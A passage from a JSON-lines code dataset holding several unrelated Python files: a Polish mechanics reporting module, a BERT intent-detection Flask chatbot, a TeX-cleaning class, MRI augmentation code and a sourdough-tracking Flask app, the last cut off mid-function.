otrzumuje się następujące zlinearyzowane równanie:\n '''))\n display((SympyFormula( Eq(MultivariableTaylorSeries(eom,coords,n=1,x0=op_point).doit().expand().simplify().expand(),0,evaluate=False) , marker=mrk_lagrangian_lin,backend=latex ) ))\n\n\n\n AutoBreak.latex_backend = latex_store\n\n\n \nclass FundamentalMatrixComponent(ReportComponent):\n \n title=\"Wyznaczanie macierzy fundamentalnej\"\n \n def append_elements(self):\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Z równań ruchu wyznaczono macierz mas i sztywności układu:\n '''))\n display((SympyFormula( Eq(Symbol('M'),dyn_sys_lin.inertia_matrix(),evaluate=False) , marker='a' ) ))\n\n display((SympyFormula( Eq(Symbol('K'),dyn_sys_lin.stiffness_matrix(),evaluate=False) , marker='a') ))\n\n Delta = Symbol('\\Delta')\n\n display(ReportText(f'''Macierz fundamentalna, na podstawie której wyznaczono równanie charakterystyczne rozważanego układu ${latex(Delta)}$, przedstawiają się następująco:\n '''))\n\n display((SympyFormula( Eq(Symbol('A'),dyn_sys_lin.fundamental_matrix(),evaluate=False) , marker='a' ) ))\n display((SympyFormula( Eq(Delta,dyn_sys_lin.fundamental_matrix().det().expand().simplify().simplify().expand(),evaluate=False) , marker='a',backend=latex ) ))\n\n display(ReportText(f'''Macierz fundamentalna pozwala określić rozwiązanie ustalone. Natomiast bazując na równaniu charakterystycznym określa się częstości własne układu.\n '''))\n\n AutoBreak.latex_backend = latex_store\n\nclass GeneralSolutionComponent(ReportComponent):\n \n title=\"Rozwiązanie ogólne\"\n \n def append_elements(self):\n\n from ...dynamics import LagrangesDynamicSystem, HarmonicOscillator\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Rozwiązanie ogólne przedstawia wyrażenie:\n '''))\n display((SympyFormula( Eq(Symbol('X'),HarmonicOscillator(dyn_sys_lin.linearized(\n )).general_solution().n(3),\n evaluate=False) , marker='a',backend=latex ) ))\n\n display(ReportText(f'''Rozwiązanie ogólne opisuje ruch analizowanego układu (przedstawia przemieszczenie w funkcji czasu) i wynika z rozważań dotyczących drgań swobodnych układu.\n '''))\n\n AutoBreak.latex_backend = latex_store\n\n \n \nclass FrequencyResponseFunctionComponent(ReportComponent):\n \n title=\"Charakterystyka Amplitudowo-Częstotliwościowa\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n funkcja odpowiedzi częstotliwościowej:\n '''))\n\n display(SympyFormula( Eq(Symbol('frf'),\n dyn_sys.frequency_response_function() ), marker=None))\n\n display(ReportText(f'''\n jest to suma kwadratów amplitud pod pierwiastkiem\n ''')) \n \nFRFComponent = FrequencyResponseFunctionComponent\n\nclass FrequencyResponseFunctionComponentToSecond(ReportComponent):\n \n title=\"sens mocy układu\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n sens mocy układu:\n '''))\n\n display(SympyFormula( Eq(Symbol('frf^2'),\n dyn_sys.frequency_response_function().doit()**2 ), marker=None))\n\n display(ReportText(f'''\n Charakterystyka 
Amplitudowo-Częstotliwościowa podniesiona do kwadratu\n ''')) \n \n\n\n \n\nclass SteadySolutionComponent(ReportComponent):\n \n title=\"Rozwiązanie szczególne\"\n _phi=False\n def append_elements(self,phi=_phi):\n\n from ...dynamics import LagrangesDynamicSystem, HarmonicOscillator\n \n system = self._system\n ReportText.set_directory('./SDAresults')\n\n latex_store=AutoBreak.latex_backend\n AutoBreak.latex_backend = latex_store\n \n t=system.ivar\n \n\n dyn_sys=system\n dyn_sys_lin=dyn_sys.linearized()\n\n\n display(ReportText(f'''Rozwiązanie szczególne przedstawia wyrażenie:\n '''))\n\n display((SympyFormula( Eq(Symbol('X_s'),\n HarmonicOscillator(dyn_sys_lin.linearized(\n )).steady_solution().n(3),\n evaluate=False) , marker='b',backend=latex ) ))\n\n AutoBreak.latex_backend = latex_store\n\n display(ReportText(f'''Rozwiązanie szczególne związane jest obecnością wielkości wymuszających ruch (drgania) analizowanego układu.\n '''))\n \nclass MaxStaticForce(ReportComponent):\n \n title=\"Maksymalna siła statyczna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Wartość maksymalna siły statycznej działającej na pojedynczy element mocujący:\n '''))\n\n display(SympyFormula( Eq(Symbol('F_s'),\n dyn_sys.max_static_force().doit() ), marker=None))\n\n display(ReportText(f'''\n Wartość maksymalna siły statycznej działającej na pojedynczy element mocujący.\n ''')) \n \nclass MaxDynamicForce(ReportComponent):\n \n title=\"Maksymalna siła statyczna\"\n\n def append_elements(self):\n\n system = self._system\n dyn_sys=system\n dyn_sys_lin = dyn_sys\n\n\n display(ReportText(f'''\n Wartość maksymalna siły dynamicznej działającej na pojedynczy element mocujący:\n '''))\n\n display(SympyFormula( Eq(Symbol('F_d'),\n dyn_sys.max_dynamic_force().doit() ), marker=None))\n\n display(ReportText(f'''\n Wartość maksymalna siły dynamicznej działającej na pojedynczy element mocujący:\n ''')) ","repo_name":"bogumilchilinski/dynpy","sub_path":"utilities/components/mechanics.py","file_name":"mechanics.py","file_ext":"py","file_size_in_byte":32155,"program_lang":"python","lang":"pl","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"6138599417","text":"import numpy as np\nimport pandas as pd\nimport re\nimport torch\nimport random\nimport torch.nn as nn\nimport json \nfrom transformers import AutoModel, BertTokenizerFast\nfrom transformers import DistilBertTokenizer, DistilBertModel\nfrom transformers import AutoModel, BertTokenizerFast\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\n# specify GPU\nUSE_CUDA = torch.cuda.is_available()\ndevice = torch.device(\"cpu\")\n\n# Converting the labels into encodings\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\n# Based on the histogram we are selecting the max len as 8\nmax_seq_len = 8\n\nwords=[]\nclasses = []\ndocuments = []\nignore_words = ['?', '!']\n\ndata_file = open('server/agents/Intents_detection/intents.json').read()\nintents = json.loads(data_file)\n\n\nfor intent in intents['intents']:\n for pattern in intent['patterns']:\n\n #add documents in the corpus\n documents.append((pattern, intent['tag']))\n\n # add to our classes list\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n\ndf = pd.DataFrame(documents, columns = [\"text\", \"label\"])\ndf['label'] = le.fit_transform(df['label'])\n# check class distribution\ndf['label'].value_counts(normalize = True)\n# Load the BERT 
tokenizer\ntokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')\n# Import BERT-base pretrained model\nbert = AutoModel.from_pretrained('bert-base-uncased')\n\n# Load the DistilBert tokenizer\ntokenizer = DistilBertTokenizer.from_pretrained('distilbert-base-uncased')\n# Import the DistilBert pretrained model\nbert = DistilBertModel.from_pretrained('distilbert-base-uncased')\n\n\nclass BERT_Arch(nn.Module):\n def __init__(self, bert): \n super(BERT_Arch, self).__init__()\n self.bert = bert \n \n # dropout layer\n self.dropout = nn.Dropout(0.2)\n \n # relu activation function\n self.relu = nn.ReLU()\n # dense layer\n self.fc1 = nn.Linear(768,512)\n self.fc2 = nn.Linear(512,256)\n self.fc3 = nn.Linear(256,9)\n #softmax activation function\n self.softmax = nn.LogSoftmax(dim=1)\n #define the forward pass\n def forward(self, sent_id, mask):\n #pass the inputs to the model \n cls_hs = self.bert(sent_id, attention_mask=mask)[0][:,0]\n \n x = self.fc1(cls_hs)\n x = self.relu(x)\n x = self.dropout(x)\n \n x = self.fc2(x)\n x = self.relu(x)\n x = self.dropout(x)\n # output layer\n x = self.fc3(x)\n \n # apply softmax activation\n x = self.softmax(x)\n return x\n\nfor param in bert.parameters():\n param.requires_grad = False\nmodel = BERT_Arch(bert)\nmodel.load_state_dict(torch.load(\"server/agents/Intents_detection/model.zip\", device))\nmodel = model.to(device)\n\ndef get_prediction(str, model):\n str = re.sub(r'[^a-zA-Z ]+', '', str)\n test_text = [str]\n model.eval()\n \n tokens_test_data = tokenizer(\n test_text,\n max_length = max_seq_len,\n pad_to_max_length=True,\n truncation=True,\n return_token_type_ids=False\n )\n test_seq = torch.tensor(tokens_test_data['input_ids'])\n test_mask = torch.tensor(tokens_test_data['attention_mask'])\n \n preds = None\n with torch.no_grad():\n preds = model(test_seq.to(device), test_mask.to(device))\n preds = preds.detach().cpu().numpy()\n preds = np.argmax(preds, axis = 1)\n print(\"Intent Identified: \", le.inverse_transform(preds)[0])\n return le.inverse_transform(preds)[0]\n\ndef get_response(message, model): \n intent = get_prediction(message, model)\n intents = json.loads(open('server/agents/Intents_detection/intents.json').read())\n for i in intents['intents']: \n if i[\"tag\"] == intent:\n result = random.choice(i[\"responses\"])\n message={ \"answer\":[{\"_type\": \"dialog\",\n \"message\": result}]}\n break\n #print(f\"Response : {result}\")\n return message\n\n\n#get_response(\"i need my certificate work \", model)\n\n\n\napp = Flask(__name__)\nCORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n@app.route('/api/search/smart-agent/search/', methods=['GET', 'POST'])\ndef test(term):\n chatbot_message = get_response(term, model)\n\n return jsonify(chatbot_message)\napp.run(debug=True, port=9090)\n","repo_name":"1feres1/DigitalBeing","sub_path":"server/agents/Intents_detection/intents_detect.py","file_name":"intents_detect.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"32454258873","text":"\"\"\"Handling a Tex document.\"\"\"\n\nfrom __future__ import annotations # Support of `|` for type union in Python 3.9\nfrom typing import TextIO\n\nfrom knowledge_clustering import misc\n\n\nclass TexDocument:\n \"\"\"Class for handling a tex document.\"\"\"\n\n def __init__(self, tex_code: str) -> None:\n self.tex_code: str = tex_code\n self.lines: list[str] = self.tex_code.split(\"\\n\")\n self.__update_col_line()\n self.__clean()\n self.length: 
int = len(self.tex_cleaned)\n\n def __update_col_line(self) -> None:\n \"\"\"\n Compute two arrays, saying for each index i of self.text, at what column and\n what line of the text this index is located.\n \"\"\"\n self.find_line: list[int] = [0] * len(self.tex_code)\n self.find_col: list[int] = [0] * len(self.tex_code)\n line: int = 1\n col: int = 1\n for (position, letter) in enumerate(self.tex_code):\n self.find_line[position] = line\n self.find_col[position] = col\n if letter == \"\\n\":\n line += 1\n col = 1\n else:\n col += 1\n\n def __clean(self):\n \"\"\"\n Reads self.tex_code (the original tex file), given as a single string.\n Converts spaces, tabulations and new lines into a single space, except\n if there is two consecutive new lines. Removes commented lines.\n The cleaned file is stored in self.tex_cleaned. A pointer\n from tex_cleaned to tex_code, in the form of an array, is produced in self.pointer.\n \"\"\"\n # Essentially, the algorithm is a deterministic transducer with five states\n # 0: the last character is `normal` (not a space, a tab, nor a new line) ; initial state\n # 1: the last character is not normal,\n # and no new line was read since the last normal character\n # 2: the last character is not normal,\n # and exactly one new line was read since the last normal character\n # 3: the last character is not normal,\n # and at least two new lines were read since the last normal character\n # 4: the line is commented.\n def is_normal(letter: str) -> bool:\n return letter not in [\" \", \"\\t\", \"\\n\", \"%\"]\n\n def transition(\n state: int, letter: str, counter: int\n ) -> tuple[int, str, int | None]:\n \"\"\"\n Input: curent state, input letter and the size of produced output so far\n Output: returns the new state, the output, and the pointer of the input letter.\n \"\"\"\n if is_normal(letter):\n if state == 4:\n return (4, \"\", None)\n return (0, letter, counter)\n if letter == \"%\":\n return (4, \"\", None)\n if letter == \"\\n\":\n if state == 4:\n return (0, \"\", None)\n if state == 0:\n return (2, \" \", None)\n if state == 1:\n return (2, \"\", None)\n if state == 2:\n return (3, \"\\\\par \", counter)\n return (3, \"\", None)\n if letter in [\" \", \"\\t\"]:\n if state == 0:\n return (1, \" \", counter)\n return (state, \"\", None)\n raise Exception(\"Transition not defined\", state, letter)\n\n state: int = 0\n tex_cleaned: str = \"\"\n m: int = 0\n pointer: list[None | int] = []\n for position, letter in enumerate(self.tex_code):\n state, output, input_pointer = transition(state, letter, m)\n tex_cleaned += output\n m += len(output)\n # Put position at index input_pointer\n if input_pointer is not None:\n pointer += [None] * (input_pointer - len(pointer)) + [position]\n self.tex_cleaned: str = tex_cleaned\n self.pointer: list[None | int] = pointer\n\n def print(self, start: int, end: int, n: int, out: TextIO):\n \"\"\"\n Prints the lines between positions (in the clean tex) `start` and `end`\n together with `n`-1 lines preceding `start`.\n Emphasize the part between `start` and `end`.\n \"\"\"\n start_p = self.pointer[start]\n end_p = self.pointer[end]\n if isinstance(start_p, int) and isinstance(end_p, int):\n l_start: int = self.find_line[start_p]\n c_start: int = self.find_col[start_p]\n l_end: int = self.find_line[end_p]\n c_end: int = self.find_col[end_p]\n for i in range(max(0, l_start - n), l_end):\n if i + 1 == l_start and i + 1 == l_end:\n print(\n f\"l{i+1}: \\t{self.lines[i][:c_start-1]}\"\n + misc.emph(self.lines[i][c_start - 1 : c_end])\n 
+ self.lines[i][c_end:],\n file=out,\n )\n elif i + 1 == l_start:\n print(\n f\"l{i+1}: \\t{self.lines[i][:c_start-1]}\"\n + misc.emph(self.lines[i][c_start - 1 :]),\n file=out,\n )\n elif i + 1 == l_end:\n print(\n f\"l{i+1}: \\t\"\n + misc.emph(self.lines[i][:c_end])\n + self.lines[i][c_end:],\n file=out,\n )\n elif l_start < i + 1 and i + 1 < l_end:\n print(f\"l{i+1}: \\t\" + misc.emph(self.lines[i]), file=out)\n else:\n print(f\"l{i+1}: \\t{self.lines[i]}\", file=out)\n else:\n raise Exception(\"Undefined pointer\", self.pointer, (start, end))\n","repo_name":"remimorvan/knowledge-clustering","sub_path":"knowledge_clustering/tex_document.py","file_name":"tex_document.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"8616493007","text":"import sys\n\nfile_with_keys = sys.argv[1]\n\nkeys = [tuple(line.rstrip('\\n').split(',')) for line in open(file_with_keys,'r')]\n\nfor line in sys.stdin:\n *key, value = line.strip().split(',')\n\n if tuple(key) in keys:\n print(value)","repo_name":"VladimirNikiforov/netology-ds","sub_path":"02. Python_and_Statistics/py/bonus_script.py","file_name":"bonus_script.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"37733666322","text":"from __future__ import print_function\nimport os,sys\nimport nibabel as nib\nimport random\nimport time\nimport scipy.ndimage\nimport pandas as pd\nimport numpy as np\nnp.seterr(all='raise')\nfrom subprocess import check_call\n\n\n\ndef normalize(img):\n m=np.mean(img)\n st=np.std(img)\n norm = (img - m) / st\n return norm\n\ndef swap_axes(img):\n img = np.swapaxes(img,0,2)\n img = img[::-1, ::-1, :]\n sh=np.asarray(img.shape)\n img = np.swapaxes(img,2,np.argmin(sh))\n return img\n\ndef pad_img(img,c=(0,0,0)):\n # c is corner where to locate image\n blank=np.zeros((256,256,64))\n blank[c[0]:c[0]+img.shape[0],c[1]:c[1]+img.shape[1],c[2]:c[2]+img.shape[2]]=img\n return blank\n\ndef resize_img(img,img_shape):\n size=list(img_shape)\n zoom=[1.0*x/y for x, y in zip(size, img.shape)]\n return scipy.ndimage.zoom(img, zoom=zoom)\n\ndef get_subj_data(p,input_size=(256,256,64,1)):\n img_shape=input_size[:-1]\n subj_data = np.zeros(input_size)\n affine=np.eye(len(np.squeeze(subj_data.shape)))\n if '.mnc.gz' in p:\n img = nib.load(p)\n data = img.get_data()\n data = swap_axes(data)\n # print(data.shape)\n if any(np.asarray(data.shape)>np.asarray(img_shape)):\n data=resize_img(data,img_shape)\n # data = normalize(data)\n data = pad_img(data)\n subj_data = np.reshape(data,input_size)\n return subj_data,img.affine\n else:\n print(\"File is not mnc.gz : {}\".format(p))\n return subj_data,affine\n\n\ndef random_rotate(subj_data):\n input_shape = subj_data.shape\n # maximum angle to define range\n max_angle = 5\n\n # rotate along (x,y) plane\n alpha = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, alpha, axes=(0,1),reshape=True)\n # rotate along (x,z) plane\n beta = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, beta, axes=(0,2),reshape=True)\n # rotate along (y,z) plane\n theta = random.uniform(-max_angle,max_angle)\n subj_data = scipy.ndimage.rotate(subj_data, theta, axes=(1,2),reshape=True)\n # reshape=True above changes the size of the image to we need to resize\n subj_data = resize_img(subj_data,input_shape)\n return subj_data\n\n\ndef 
random_translation(subj_data):\n input_shape = subj_data.shape\n # wall size will be 5 voxels\n wall = 5\n img_shape_small = tuple(i-wall for i in input_shape[:-1]) + (1,)\n subj_data_small = resize_img(subj_data,img_shape_small)\n corner = tuple([random.randint(0,wall) for i in range(3)])\n subj_data = pad_img(np.squeeze(subj_data_small),c=corner)\n subj_data = np.reshape(subj_data,input_shape)\n return subj_data\n\n\ndef random_flip_xyz(subj_data):\n flip_x = random.randint(0,1)*2-1\n flip_y = random.randint(0,1)*2-1\n flip_z = random.randint(0,1)*2-1\n return subj_data[::flip_x, ::flip_y, ::flip_z, :]\n\ndef random_brightness(subj_data):\n amplitude = np.abs(1*random.gauss(0,1))+1\n brighter = random.randint(0,1)\n if not brighter:\n amplitude = 1.0/amplitude\n return amplitude*subj_data\n\n\n\ndef data_augment(subj_data):\n # random rotation along (x,y), (x,z) and (y,z)\n subj_data = random_rotate(subj_data)\n # random translation in either x, y, and z\n subj_data = random_translation(subj_data)\n # random flip in the x, y, and/or z\n # subj_data = random_flip_xyz(subj_data)\n # amplify by floating number, will brighten if > 1.0 and dim if < 1.0\n # subj_data = random_brightness(subj_data)\n return subj_data\n\n\n\ndef save_to_nii(data,affine,fn):\n # data = data.reshape(data.shape+(1,))\n # affine=np.eye(len(data.shape))\n img_nii = nib.Nifti1Image(data,affine)\n if not os.path.isfile(fn+'.gz'):\n print('Saving augmented data to gun zipped file : {}'.format(fn+'.gz'))\n nib.save(img_nii,fn)\n check_call(['gzip', fn])\n else:\n print('File {} already exists'.format(fn+'.gz'))\n\n\n\n\nview=False\n\n# Book keeping\nprint(\"Executing:\",__file__)\nprint(\"Contents of the file during execution:\\n\",open(__file__,'r').read())\n\n# This will have the directory and the label\npath = '/home/rpizarro/noise/XValidFns/multiple_artifact/clean_percent_098/XV0'\n# XV_set = 'XV0'\ntrain_fn = '/home/rpizarro/noise/XValidFns/single_artifact/clean_percent_050/XV0/train.art123.csv'\ndf_done = pd.read_csv(train_fn,index_col=0)\n# valid_fn = os.path.join(path,'valid.art123.csv')\n# valid = pd.read_csv(valid_fn,index_col=0)\n\nprint(df_done.shape)\n\n\n# training file to be augmented\nfn = '/data/datasets/shared/rpizarro/noise/weights/rap_NN008_multiple_artifact/clean_percent_050/XV0/nb_classes_02/nb_samples_factor_01.00/001-CLR-trg12_NN8mod_priming_ep500/train.art123.ep419.csv'\ndf = pd.read_csv(fn,index_col=0)\n\ncol_list = list(df)\ncol_list.remove('path')\ninput_size=(256,256,64,1)\n\nfor da_idx in [4]: # range(5):\n print('Going through data augmentation number : {}'.format(da_idx))\n start_da = time.time()\n\n train_aug_fn = os.path.join(path,'augmented','train.art123.aug{0:03d}.csv'.format(da_idx))\n df_aug = pd.DataFrame(columns=list(df))\n\n for idx in range(df.shape[0]):\n start_idx = time.time()\n f_orig = df.iloc[[idx]].path.values[0]\n subj_label = df.iloc[[idx]][col_list].values.tolist()[0]\n print(\"{} : {} : {}\".format(idx,subj_label,f_orig))\n\n f_orig_dir = os.path.dirname(f_orig)\n\n if f_orig in set(df_done['path']):\n f_aug_dir = f_orig_dir.replace('data/datasets','data2/datasets/aug')\n f_aug_base = os.path.basename(f_orig).replace('.mnc.gz','_aug{0:03d}.nii'.format(da_idx))\n f_aug = os.path.join(f_aug_dir,f_aug_base)\n row = pd.DataFrame([subj_label+[f_aug+'.gz']],columns=list(df))\n df_aug = df_aug.append(row,ignore_index=True)\n print('Skipping since we already augmented : {}'.format(f_orig))\n continue\n\n print('Could not find so we will augment idx : {}'.format(idx))\n\n 
f_aug_dir = f_orig_dir.replace('data/datasets','data/datasets/shared/rpizarro/aug')\n if not os.path.exists(f_aug_dir):\n print('Does not exist so we are creating dir : {}'.format(f_aug_dir))\n os.makedirs(f_aug_dir)\n f_aug_base = os.path.basename(f_orig).replace('.mnc.gz','_aug{0:03d}.nii'.format(da_idx))\n f_aug = os.path.join(f_aug_dir,f_aug_base)\n f_aug_gz = f_aug+'.gz'\n row = pd.DataFrame([subj_label+[f_aug_gz]],columns=list(df))\n df_aug = df_aug.append(row,ignore_index=True)\n\n if os.path.exists(f_aug_gz):\n print('We have already augmented : {}'.format(f_aug_gz))\n continue\n \n subj_data,affine = get_subj_data(f_orig,input_size)\n subj_data = data_augment(subj_data) \n save_to_nii(subj_data,affine,f_aug)\n\n elapsed_idx = time.time() - start_idx\n print('Time it took to augment one file : {0:0.2f} seconds'.format(elapsed_idx))\n\n elapsed_da = time.time() - start_da\n print('Time it took to augment {0} files : {1:0.2f} minutes'.format(idx,elapsed_da/60.0))\n\n print('Saving list of augmented files to : {}'.format(train_aug_fn))\n df_aug.to_csv(train_aug_fn)\n\n\n\n","repo_name":"AS-Lab/Pizarro-et-al-2023-DL-detects-MRI-artifacts","sub_path":"research/exp/noise.augment_data.py","file_name":"noise.augment_data.py","file_ext":"py","file_size_in_byte":7176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26426724759","text":"from typing import List\n\nfrom sourdough.db.models.feeding_actions_table import FeedingActionModel\nfrom sourdough.db.models.extractions_table import ExtractionModel\nfrom sourdough.db.models.refrigerator_actions_table import RefrigeratorActionModel\nfrom sourdough.db.models.sourdough_table import SourdoughModel\nfrom sourdough.db.models.sourdough_targets_table import SourdoughTargetModel\nfrom sourdough.db.models.user_table import UserModel\nfrom sourdough.db.orm_config import Session, Base, engine\nfrom flask import Flask, request, jsonify\nimport datetime\nimport json\n\nfrom sourdough.communication.actions import RefrigerationAction, FeedingAction, ExtractionAction, Action\nfrom sourdough.communication.messages import PerformActionsMessage, SuccessMessage, FailedMessage, InfoMessage\n\napp = Flask(__name__)\n\n\n# A flask function to create an account and it's sourdough, and adding them to the database.\n@app.route('/create_account', methods=[\"GET\", \"POST\"])\ndef create_account():\n with Session() as session:\n data = request.args\n name = data['name']\n last_name = data['last_name']\n email = data['email']\n if session.query(session.query(UserModel).filter_by(email=email).exists()).scalar():\n message = FailedMessage(\"User already exists.\")\n return json.dumps(message.to_dict())\n else:\n my_user_model = UserModel(name=name, last_name=last_name, email=email)\n session.add(my_user_model)\n session.flush()\n my_sourdough_model = SourdoughModel(user_id=my_user_model.id)\n session.add(my_sourdough_model)\n session.flush()\n not_in_fridge = RefrigeratorActionModel(sourdough_id=my_sourdough_model.id, in_or_out=\"out\")\n session.add(not_in_fridge)\n session.commit()\n message = SuccessMessage(\"Success\")\n return json.dumps(message.to_dict())\n\n\n# A flask function to see all the users in the database.\n@app.route('/show_all_users', methods=[\"GET\", \"POST\"])\ndef show_all_users():\n with Session() as session:\n users = session.query(UserModel).all()\n return_list = [str(user) for user in users]\n return_str = str(return_list)\n return jsonify(return_str)\n\n\n@app.route('/sourdough_info', 
methods=[\"GET\", \"POST\"])\ndef sourdough_info():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n sourdough_model: SourdoughModel = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n infos = []\n if len(sourdough_model.upcoming_sourdough_targets) > 0:\n infos.append(f\"target in {sourdough_model.next_sourdough_target.days_from_today} days from today\")\n infos.append(f\"fridge status: {sourdough_model.in_refrigerator}\")\n infos.append(f\"sourdough weight: {sourdough_model.weight}\")\n info_message = InfoMessage(\"\\n\".join(infos))\n return json.dumps(info_message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n# A flask function to add a new sourdough target to the database for the specified user provided from the email.\n@app.route('/add_a_target', methods=[\"GET\", \"POST\"])\ndef adding_a_sourdough_target():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n date_of_action = request.args.get('date_of_action')\n date = datetime.datetime.fromisoformat(date_of_action)\n sourdough_weight_target = request.args.get('sourdough_weight_target_in_grams')\n user_model = get_user(user_email, session)\n my_target_model = SourdoughTargetModel(sourdough_id=user_model.id,\n date_of_action=date,\n sourdough_weight_target_in_grams=int(sourdough_weight_target))\n session.add(my_target_model)\n session.commit()\n message = SuccessMessage(\"Added sourdough target successfully\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new feeding action to the database for the specified user provided from the email.\n@app.route('/add_a_feeding_action', methods=[\"GET\", \"POST\"])\ndef adding_a_feeding_action():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n water_weight = request.args.get('water_weight_added_in_grams')\n flour_weight = request.args.get('flour_weight_added_in_grams')\n user_model = get_user(user_email, session)\n my_feeding_action_model = FeedingActionModel(sourdough_id=user_model.id,\n water_weight_added_in_grams=int(water_weight),\n flour_weight_added_in_grams=int(flour_weight))\n session.add(my_feeding_action_model)\n session.commit()\n message = SuccessMessage(\"Added a feeding action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new extraction action to the database for the specified user provided from the email.\n@app.route('/add_extraction', methods=[\"GET\", \"POST\"])\ndef adding_extraction():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n sourdough_weight_extracted = request.args.get('sourdough_weight_used_in_grams')\n user_model = get_user(user_email, session)\n my_extraction_model = ExtractionModel(sourdough_id=user_model.id,\n sourdough_weight_used_in_grams=int(sourdough_weight_extracted))\n session.add(my_extraction_model)\n session.commit()\n message = SuccessMessage(\"Added an extraction action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function to add a new refrigeration action to the 
database for the specified user provided from the email.\n@app.route('/add_a_refrigerator_action', methods=[\"GET\", \"POST\"])\ndef adding_a_refrigerator_action():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n in_or_out = request.args.get('in_or_out')\n user_model = get_user(user_email, session)\n my_sourdough = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n if my_sourdough.last_refrigerator_action.in_or_out == in_or_out:\n raise Exception(\"Sourdough refrigeration state must be different\")\n my_refrigerator_action_model = RefrigeratorActionModel(sourdough_id=my_sourdough.id, in_or_out=in_or_out)\n session.add(my_refrigerator_action_model)\n session.commit()\n message = SuccessMessage(\"Added a refrigeration action successfully.\")\n return json.dumps(message.to_dict())\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\n# A flask function that returns the sourdough starter weight for the specified user provided from the email.\n@app.route('/my_sourdough_starter_weight', methods=[\"GET\", \"POST\"])\ndef my_sourdough_starter_weight():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n my_sourdough = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n my_weight = my_sourdough.weight\n return json.dumps(my_weight)\n except Exception as e:\n message_failed = FailedMessage(repr(e))\n return json.dumps(message_failed.to_dict())\n\n\ndef keep_sourdough_at_maintenance(sourdough_model) -> List[Action]:\n actions_to_perform = list()\n\n if sourdough_model.in_refrigerator:\n if sourdough_model.days_in_refrigerator > 10:\n # if sourdough is too long in the fridge, extract from it so it reaches minimum maintenance weight\n if not sourdough_model.extracted_today:\n extract = ExtractionAction(sourdough_model.weight - sourdough_model.min_maintenance_weight)\n actions_to_perform.append(extract)\n elif sourdough_model.fed_today:\n # if already extracted, feed it by its own weight\n feed = FeedingAction(sourdough_model.weight, sourdough_model.weight)\n actions_to_perform.append(feed)\n else:\n \"\"\"\n sourdough is at maintenance and isnt too long in the fridge. 
do nothing\n \"\"\"\n\n else:\n # sourdough in maintenance must be in fridge\n fridge_action = RefrigerationAction(\"in\")\n actions_to_perform.append(fridge_action)\n\n return actions_to_perform\n\n\n@app.route('/my_action_today', methods=[\"GET\", \"POST\"])\ndef my_action_today():\n with Session() as session:\n try:\n user_email = request.args.get('email')\n user_model = get_user(user_email, session)\n sourdough_model: SourdoughModel = session.query(SourdoughModel).filter_by(user_id=user_model.id).one()\n\n actions_to_perform = list()\n\n if sourdough_model.has_upcoming_targets:\n next_sourdough_target = sourdough_model.next_sourdough_target\n if next_sourdough_target.days_from_today > 3:\n # if target is more than 3 days in the future, keep at maintenance\n actions_to_perform += keep_sourdough_at_maintenance(sourdough_model)\n\n elif 0 < next_sourdough_target.days_from_today <= 3:\n # if in the 3 last days before target, feed to triple weight every day\n if sourdough_model.in_refrigerator:\n fridge_action = RefrigerationAction(\"out\")\n actions_to_perform.append(fridge_action)\n if not sourdough_model.fed_today:\n feed = FeedingAction(sourdough_model.weight, sourdough_model.weight)\n actions_to_perform.append(feed)\n\n elif next_sourdough_target.days_from_today == 0:\n # if today is the target day, feed until target weight\n missing_weight = next_sourdough_target.sourdough_weight_target_in_grams - sourdough_model.weight\n feed = FeedingAction(missing_weight / 2, missing_weight / 2)\n actions_to_perform.append(feed)\n else:\n # sourdough has no upcoming targets\n actions_to_perform += 